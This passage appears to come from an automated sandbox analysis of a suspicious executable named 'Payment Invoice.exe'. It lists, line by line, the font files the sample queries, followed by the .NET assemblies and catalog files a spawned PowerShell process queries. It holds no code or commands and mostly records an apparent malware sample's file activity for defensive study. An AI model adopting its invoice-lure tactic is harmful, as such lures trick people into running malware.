                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
